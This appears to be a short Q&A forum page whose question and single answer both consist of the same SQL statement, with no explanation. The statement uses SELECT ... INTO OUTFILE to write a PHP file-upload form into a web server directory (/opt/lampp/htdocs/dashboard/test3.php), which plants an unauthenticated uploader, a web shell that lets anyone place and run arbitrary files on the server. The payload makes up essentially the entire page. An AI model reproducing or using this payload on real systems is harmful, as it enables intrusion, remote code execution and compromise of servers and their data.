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+1 vote
SELECT "<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>" into outfile "/opt/lampp/htdocs/dashboard/test3.php";
by (109 points)

1 Answer

0 votes

SELECT "<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>" into outfile "/opt/lampp/htdocs/dashboard/test3.php";
by (277 points)